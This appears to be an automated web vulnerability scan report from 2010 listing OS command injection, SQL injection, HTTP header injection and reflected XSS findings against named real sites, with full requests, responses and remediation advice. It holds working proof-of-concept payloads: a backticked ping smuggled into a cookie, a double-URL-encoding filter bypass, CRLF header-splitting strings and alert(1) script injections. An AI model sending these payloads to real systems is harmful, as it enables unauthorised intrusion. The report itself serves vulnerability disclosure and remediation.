The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utmc cookie. The application took 35911 milliseconds to respond to the request, compared with 1020 milliseconds for the original request, indicating that the injected command caused a time delay.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
Request
GET /people/dan.j.allen/blog/2010/10/20/speaking-at-utah-jug HTTP/1.1 Host: community.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rh_omni_tc=70160000000H4AjAAK; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=redhatglobal%2Credhatjbossorg%3D%2526pid%253Dhttp%25253A//community.jboss.org/account/login.jspa%2526oid%253DLogin%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D428; jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; s_ria=flash%2010%7Csilverlight%20not%20detected; s_vnum=1292422844821%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1289831298721; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmc=153813930`ping%20-c%2020%20127.0.0.1`; __utmb=153813930.2.10.1289831027;
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Date: Mon, 15 Nov 2010 07:35:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 341 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string '3''.</font> ...[SNIP]...
The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Date: Mon, 15 Nov 2010 07:28:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 353 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string '-- Keyword --''.</font> ...[SNIP]...
The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://27.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://27.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload df8cc%0d%0afc9c0f60969 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22&df8cc%0d%0afc9c0f60969=1 HTTP/1.1 Host: 27.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:31:38 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=260e714d-3349-3fa8-629a-00004b889a33; expires=Sun, 13-Feb-2011 09:31:38 GMT; path=/; domain=.xg4ken.com Location: https://ddb.kineticd.com/ads/ppc.aspx/x22?df8cc fc9c0f60969=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload f07da%0d%0a7c3685c0c33 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22f07da%0d%0a7c3685c0c33 HTTP/1.1 Host: 27.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:31:39 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=2ed9d8ec-0b69-c609-d39a-000059980589; expires=Sun, 13-Feb-2011 09:31:39 GMT; path=/; domain=.xg4ken.com Location: https://ddb.kineticd.com/ads/ppc.aspx/x22f07da 7c3685c0c33 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the Location response header. The payload 91a3b%0d%0a8a3d72eaf29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 7d98a%0d%0a59d7a244a36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7d98a%0d%0a59d7a244a36/N4300.NYTimes/B5008440.7 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7d98a 59d7a244a36/N4300.NYTimes/B5008440.7: Date: Mon, 15 Nov 2010 11:44:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 72682%0d%0a5799f80cf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 36239%0d%0ad7834691ffb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 89338%0d%0ae8e383c05b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq request parameter is copied into the location response header. The payload b8461%0d%0adb4a5794385 was submitted in the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.
Request
GET /n/80094/80572/www.sap.com/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=b8461%0d%0adb4a5794385&247cr=6349709945/x22 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:41:26 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Mon, 15 Nov 2010 09:41:26 GMT location: http://www.sap.comb8461 db4a5794385 Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814086/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814086/ct%2c/0/http%3a%2f%2fwww%2esap%2ecomb8461%0d%0adb4a5794385/26481749/0; expires=Wed, 15-Dec-2010 09:41:26 GMT; path=/n/80094; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9304437677715620207; expires=Tue, 15-Nov-2011 09:41:26 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9304437677698843084; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the location response header. The payload f7f81%0d%0a4d471187b11 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/80094/80572/f7f81%0d%0a4d471187b11/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%2bcomputing%26dna%3d%3cx%3dthirdPartyTracking%28%27%2c%27%2c1%2c255%29%3e&247cr=6349709945/x22 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:41:27 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Mon, 15 Nov 2010 09:41:27 GMT location: http://f7f81 4d471187b11/mk/get/SEA13?SOURCEID=41&campaigncode=CRM-XJ10-USM-SEARCH18&source=msgsdkwus01&tnt=cloud&kw=cloud+computing&dna=<x=thirdPartyTracking(',',1,255)> Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814087/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814087/ct%2c/0/http%3a%2f%2ff7f81%0d%0a4d471187b11%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%252bcomputing%26dna%3d80572%252c8%252c0%252c109278422%252c769481856%252c1289814087%252c%252c26481749%252c0/26481749/0; expires=Wed, 15-Dec-2010 09:41:27 GMT; path=/n/80094; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9322452076560646501; expires=Tue, 15-Nov-2011 09:41:27 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9322452076560646613; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 72cdf%0d%0a2b3a821784 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /2233/rq/72cdf%0d%0a2b3a821784/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1 Host: pixel2233.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:43:05 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=NM1M4QCpAAAANmo; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~NM1M4QCpAAAANmo; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~NM1M4QCpAAAANmo~ev_uid~2233~ev_sid~72cdf 2b3a821784~ev_clientid~s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online storage~ev_clickid~NM1M4QCpAAAANmo~ev_clicktime~20101115094305; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=NM1M4QCpAAAANmo:20101115094305:s Expires: Mon, 15 Nov 2010 09:43:05 GMT Content-Length: 472 Keep-Alive: timeout=15, max=672 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/ ...[SNIP]...
The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload c925c%0d%0aeac5f79dbde was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /2233/rq/3/c925c%0d%0aeac5f79dbde/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1 Host: pixel2233.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:43:06 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~MyRM4QCqAQAAIkQ~ev_uid~2233~ev_sid~3~ev_clientid~c925c eac5f79dbde~ev_clickid~MyRM4QCqAQAAIkQ~ev_clicktime~20101115094306; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=MyRM4QCqAQAAIkQ:20101115094306:s Expires: Mon, 15 Nov 2010 09:43:06 GMT Content-Length: 472 Keep-Alive: timeout=15, max=973 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/ ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload d985f%0d%0a0cf54ea3fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d985f%0d%0a0cf54ea3fe2/x22 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /d985f 0cf54ea3fe2/x22/ Date: Mon, 15 Nov 2010 10:48:03 GMT Connection: close Content-Length: 85
The URL has moved to <a href="/d985f 0cf54ea3fe2/x22/">/d985f 0cf54ea3fe2/x22/</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 6b2a5%0d%0abc8e8fdeedd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /cloudcomputing/6b2a5%0d%0abc8e8fdeedd HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /cloudcomputing/6b2a5 bc8e8fdeedd/ Date: Mon, 15 Nov 2010 10:48:04 GMT Connection: close Content-Length: 107
The URL has moved to <a href="/cloudcomputing/6b2a5 bc8e8fdeedd/">/cloudcomputing/6b2a5 bc8e8fdeedd/</a>
The value of REST URL parameter 3 is copied into the Location response header. The payload 36d77%0d%0ac41153cb8fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /form/signup/36d77%0d%0ac41153cb8fb HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /form/signup/36d77 c41153cb8fb/ Date: Mon, 15 Nov 2010 10:48:08 GMT Connection: close Content-Length: 101
The URL has moved to <a href="/form/signup/36d77 c41153cb8fb/">/form/signup/36d77 c41153cb8fb/</a>
4. Cross-site scripting (reflected)
There are 617 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload 80331%0aalert(1)//da7467547cd was submitted in the CategoryID parameter. This input was echoed as 80331 alert(1)//da7467547cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYTULS_FSBOStaging/default.asp?CategoryID=BIZDIR80331%0aalert(1)//da7467547cd HTTP/1.1 Host: 209.11.106.150 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 11:19:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 25743 Content-Type: text/html Set-Cookie: ASPSESSIONIDAAQTADCQ=BMIBILIAJOFCDJHKDMMIHHEA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>The New York Times: Classified Marketplace Place an Ad</TITLE>
<meta name="keywords" content="Classified Marketp
...[SNIP]...
<SCRIPT TYPE="text/javascript">
//-------------------------------------------------------------------------
function Check_Step1()
{
var chk = "N"
//if ('BIZDIR80331
alert(1)//da7467547cd' != 'BOSWTS')
//{
//document.ListingType.LTypeId.checked = true;
//return true
//}
for (i = 0; i < document.ListingType.LTypeId.length; i ++)
{
if (document.ListingType.LTypeId[i].ch
...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821b"-alert(1)-"5f7083f8c15 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that this response is served as application/x-javascript and consists of document.write() calls, i.e. it is meant to be pulled in through a script src include on the publisher's page; the injected code therefore runs in the origin of whichever page includes the ad call, and the practical impact depends on whether an attacker can get a page in the target origin to include this script with attacker-influenced parameters.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpte821b"-alert(1)-"5f7083f8c15&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "op ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f98f2'-alert(1)-'bb5252f170b was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmptf98f2'-alert(1)-'bb5252f170b&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61202"-alert(1)-"7b65acf75e6 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt461202"-alert(1)-"7b65acf75e6&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFo ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a397'-alert(1)-'995d035cf44 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
